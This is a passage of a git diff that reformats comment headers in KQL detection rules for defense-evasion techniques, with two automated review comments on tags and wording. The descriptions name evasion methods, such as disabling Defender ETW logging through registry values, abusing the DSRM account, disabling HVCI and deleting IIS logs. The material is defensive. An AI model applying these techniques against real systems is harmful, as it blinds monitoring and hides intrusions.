+++ b/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql
@@ -3,9 +3,8 @@
 // Date: 2020-10-23
 // Level: high
 // Description: Detects attackers using tooling with bad opsec defaults.
-E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.
-One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
-
+// E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.
+// One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218.011
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql b/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql
index 69577313..387192a4 100644
--- a/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql
+++ b/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql
@@ -3,10 +3,9 @@
 // Date: 2024-07-11
 // Level: low
 // Description: Detects the execution of "BitLockerToGo.EXE".
-BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system.
-This is a rarely used application and usage of it at all is worth investigating.
-Malware such as Lumma stealer has been seen using this process as a target for process hollowing.
-
+// BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system.
+// This is a rarely used application and usage of it at all is worth investigating.
+// Malware such as Lumma stealer has been seen using this process as a target for process hollowing.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql b/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql
index 33ceb73a..7b0293cc 100644
--- a/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql
+++ b/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql
@@ -3,8 +3,7 @@
 // Date: 2024-01-17
 // Level: medium
 // Description: Detects a CodePage modification using the "mode.com" utility to Russian language.
-This behavior has been used by threat actors behind Dharma ransomware.
-
+// This behavior has been used by threat actors behind Dharma ransomware.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql b/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql
index 6e3610c5..dbdd9d4a 100644
--- a/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql
+++ b/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2020-10-07
 // Level: medium
 // Description: Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument.
-This utility can be abused in order to run custom COM object created in the registry.
-
+// This utility can be abused in order to run custom COM object created in the registry.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
diff --git a/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql b/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql
index 42e0e821..05e178b2 100644
--- a/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql
+++ b/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql
@@ -3,8 +3,7 @@
 // Date: 2022-12-01
 // Level: medium
 // Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).
-Usually this technique is used to achieve DLL hijacking.
-
+// Usually this technique is used to achieve DLL hijacking.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
diff --git a/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql b/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql
index 938e10c9..6901b5b2 100644
--- a/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql
+++ b/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql
@@ -3,7 +3,6 @@
 // Date: 2022-08-19
 // Level: medium
 // Description: Detects the execution of DeviceCredentialDeployment to hide a process from view.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql b/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql
index 0705d2cf..d3c7427f 100644
--- a/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql
+++ b/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql
@@ -3,10 +3,9 @@
 // Date: 2022-01-15
 // Level: low
 // Description: Detects execution of the builtin "rmdir" command in order to delete directories.
-Adversaries may delete files left behind by the actions of their intrusion activity.
-Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
-Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
-
+// Adversaries may delete files left behind by the actions of their intrusion activity.
+// Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
+// Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1070.004
diff --git a/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql b/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql
index 969916f8..10ed4f45 100644
--- a/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql
+++ b/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql
@@ -3,12 +3,11 @@
 // Date: 2024-07-11
 // Level: high
 // Description: Detects changes to "DsrmAdminLogonBehavior" registry value.
-During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure.
-Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory.
-If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM.
-If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped.
-If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.
-
+// During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure.
+// Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory.
+// If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM.
+// If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped.
+// If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.credential-access, attack.persistence, attack.t1556
diff --git a/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql b/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql
index 14f19685..f54e7ec6 100644
--- a/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql
+++ b/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2025-07-09
 // Level: high
 // Description: Detects the use of reg.exe to disable the Event Tracing for Windows (ETW) Autologger session for Windows Defender API and Audit events.
-By setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events
-from being logged, effectively blinding monitoring tools that rely on this data. This is a powerful defense evasion technique.
-
+// By setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events
+// from being logged, effectively blinding monitoring tools that rely on this data. This is a powerful defense evasion technique.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql b/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql
index 3348ebad..b860c395 100644
--- a/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql
+++ b/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql
@@ -3,8 +3,7 @@
 // Date: 2023-09-15
 // Level: medium
 // Description: Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension.
-Initial baselining of the allowed extension list is required.
-
+// Initial baselining of the allowed extension list is required.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql b/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql
index dad91c95..fb2e098b 100644
--- a/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql
+++ b/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql
@@ -3,8 +3,7 @@
 // Date: 2022-04-02
 // Level: medium
 // Description: Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files.
-This technique is abused by several malware families to hide their files from normal users.
-
+// This technique is abused by several malware families to hide their files from normal users.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1564.001
diff --git a/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql b/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql
index 37dd097e..c92d3b14 100644
--- a/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql
+++ b/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql
@@ -3,8 +3,7 @@
 // Date: 2022-12-01
 // Level: high
 // Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL.
-Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
-
+// Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
diff --git a/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql b/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql
index a4f28717..9a6896f9 100644
--- a/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql
+++ b/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql
@@ -3,7 +3,6 @@
 // Date: 2023-12-05
 // Level: high
 // Description: Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql b/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql
index 0a1af196..2e7b2871 100644
--- a/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql
+++ b/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql
@@ -3,9 +3,8 @@
 // Date: 2022-01-09
 // Level: low
 // Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
-Certain processes are not typically observed compiling C# code, but can do so without touching disk.
-This can be used to unpack a payload for execution
-
+// Certain processes are not typically observed compiling C# code, but can do so without touching disk.
+// This can be used to unpack a payload for execution
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1027.004
diff --git a/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql b/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql
index e81ed4dd..d3c5200a 100644
--- a/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql
+++ b/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql
@@ -3,8 +3,7 @@
 // Date: 2020-05-02
 // Level: high
 // Description: Detects changes to environment variables related to ETW logging via the CommandLine.
-This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
-
+// This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql b/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql
index b3cdd5fc..24ad5313 100644
--- a/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql
+++ b/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql
@@ -3,7 +3,6 @@
 // Date: 2019-03-22
 // Level: high
 // Description: Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1070, attack.t1562.006, car.2016-04-002
diff --git a/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql b/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql
index 5dbd1388..6178d35d 100644
--- a/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql
+++ b/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql
@@ -3,9 +3,8 @@
 // Date: 2023-01-02
 // Level: medium
 // Description: Detects the creation of new files with the ".evtx" extension in non-common or non-standard location.
-This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.
-Note that backup software and legitimate administrator might perform similar actions during troubleshooting.
-
+// This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.
+// Note that backup software and legitimate administrator might perform similar actions during troubleshooting.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.002
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql b/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql
index 2a81c7e2..eee3239b 100644
--- a/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql
+++ b/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql
@@ -3,8 +3,7 @@
 // Date: 2021-12-09
 // Level: medium
 // Description: Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process.
-This rule might require some initial baselining to align with some third party tooling in the user environment.
-
+// This rule might require some initial baselining to align with some third party tooling in the user environment.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion
diff --git a/KQL/rules/Defense Evasion/explorer_process_tree_break.kql b/KQL/rules/Defense Evasion/explorer_process_tree_break.kql
index fb82928c..d4a193d3 100644
--- a/KQL/rules/Defense Evasion/explorer_process_tree_break.kql
+++ b/KQL/rules/Defense Evasion/explorer_process_tree_break.kql
@@ -3,8 +3,7 @@
 // Date: 2019-06-29
 // Level: medium
 // Description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,
-which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"
-
+// which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036
diff --git a/KQL/rules/Defense Evasion/file_deletion_via_del.kql b/KQL/rules/Defense Evasion/file_deletion_via_del.kql
index 6509fdd5..10fa132c 100644
--- a/KQL/rules/Defense Evasion/file_deletion_via_del.kql
+++ b/KQL/rules/Defense Evasion/file_deletion_via_del.kql
@@ -3,10 +3,9 @@
 // Date: 2022-01-15
 // Level: low
 // Description: Detects execution of the builtin "del"/"erase" commands in order to delete files.
-Adversaries may delete files left behind by the actions of their intrusion activity.
-Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
-Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
-
+// Adversaries may delete files left behind by the actions of their intrusion activity.
+// Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
+// Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1070.004
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql b/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql
index 72b3577d..88c5dd72 100644
--- a/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql
+++ b/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql
@@ -3,7 +3,6 @@
 // Date: 2021-07-13
 // Level: medium
 // Description: Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
diff --git a/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql b/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql
index 6bbcad20..d1b3a747 100644
--- a/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql
+++ b/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql
@@ -3,7 +3,6 @@
 // Date: 2022-08-19
 // Level: medium
 // Description: Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
diff --git a/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql b/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql
index eade8ee0..bf3cc154 100644
--- a/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql
+++ b/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql
@@ -3,8 +3,7 @@
 // Date: 2024-06-24
 // Level: medium
 // Description: Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.).
-It is highly recommended to perform an initial baseline before using this rule in production.
-
+// It is highly recommended to perform an initial baseline before using this rule in production.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036.005
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql b/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql
index 050b2c5d..19db18b1 100644
--- a/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql
+++ b/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql
@@ -3,8 +3,7 @@
 // Date: 2020-05-26
 // Level: medium
 // Description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.).
-It is highly recommended to perform an initial baseline before using this rule in production.
-
+// It is highly recommended to perform an initial baseline before using this rule in production.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036.005
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql b/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql
index 53d5ba90..a50dfd4c 100644
--- a/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql
+++ b/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql
@@ -3,7 +3,6 @@
 // Date: 2024-01-05
 // Level: high
 // Description: Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036
diff --git a/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql b/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql
index 39f9eaa4..54cd8cbb 100644
--- a/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql
+++ b/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql
@@ -3,8 +3,7 @@
 // Date: 2019-09-26
 // Level: high
 // Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).
-Might be used by ransomwares during the attack (seen by NotPetya and others).
-
+// Might be used by ransomwares during the attack (seen by NotPetya and others).
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1485
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql b/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql
index d1537ee7..9ea10c77 100644
--- a/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql
+++ b/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql
@@ -3,7 +3,6 @@
 // Date: 2024-01-02
 // Level: high
 // Description: Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql b/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql
index 5c14fe30..4be85f32 100644
--- a/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql
+++ b/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql
@@ -3,8 +3,7 @@
 // Date: 2024-08-21
 // Level: medium
 // Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS.
-When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
-
+// When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql b/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql
index cc4ed67a..d58aa952 100644
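Review bot: The Tags line carried as context in the chflags hunk (`attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105`) does not fit a macOS hidden-flag rule and is identical, token for token, to the Tags line of the findstr rule further down in this patch, which points to the conversion script emitting the wrong rule's tag block rather than a genuine mapping. Since the commit message says the converter was reworked, it is worth re-running this one rule against its source and grepping the output for other rules that share a Tags line verbatim. I would expect a defense-evasion/T1564-style tag set here, something like `// Tags: attack.defense-evasion, attack.t1564.001`, but the upstream value cannot be confirmed from this diff, so verify before changing it.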
--- a/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql
+++ b/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql
@@ -3,8 +3,7 @@
 // Date: 2022-08-26
 // Level: high
 // Description: Detects when the "index" value of a scheduled task is modified from the registry
-Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
-
+// Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql
index c4871a93..7fe4baed 100644
--- a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql
+++ b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql
@@ -3,7 +3,6 @@
 // Date: 2022-05-14
 // Level: medium
 // Description: Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1564.002
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql b/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql
index 3452769e..abb0fcb4 100644
--- a/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql
+++ b/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql
@@ -3,7 +3,6 @@
 // Date: 2023-03-14
 // Level: high
 // Description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
diff --git a/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql b/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql
index 916a2541..25a29ba0 100644
--- a/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql
+++ b/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql
@@ -3,7 +3,6 @@
 // Date: 2024-07-05
 // Level: high
 // Description: Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
diff --git a/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql b/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql
index a7f6164b..1537c8b3 100644
--- a/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql
+++ b/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql
@@ -3,7 +3,6 @@
 // Date: 2023-09-05
 // Level: high
 // Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion
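Review bot: The Description line retained as context in the hypervisor_enforced_paging_translation hunk still reads `registry value. Where the it is set to "1"`, a sentence fragment with a stray article, so the header this commit is tidying remains awkward for the analyst who triages the alert. Suggest folding it into one sentence: `// Description: Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value, where it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.` The same hunk only removes a blank line, so this is the one place the text can be fixed without touching the converter output elsewhere.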
diff --git a/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql b/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql
index 0ce16f72..2514a852 100644
--- a/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql
+++ b/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql
@@ -3,8 +3,7 @@
 // Date: 2025-09-02
 // Level: medium
 // Description: Detects attempts to delete Internet Information Services (IIS) log files via command line utilities, which is a common defense evasion technique used by attackers to cover their tracks.
-Threat actors often abuse vulnerabilities in web applications hosted on IIS servers to gain initial access and later delete IIS logs to evade detection.
-
+// Threat actors often abuse vulnerabilities in web applications hosted on IIS servers to gain initial access and later delete IIS logs to evade detection.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1070
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql b/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql
index cb39c703..d9e28c68 100644
--- a/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql
+++ b/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2023-08-15
 // Level: medium
 // Description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly.
-This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
-
+// This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1202
diff --git a/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql b/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql
index 2a946f9e..3b7107b1 100644
--- a/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql
+++ b/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2021-11-24
 // Level: medium
 // Description: Detects execution of Microsoft bash launcher with the "-c" flag.
-This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
-
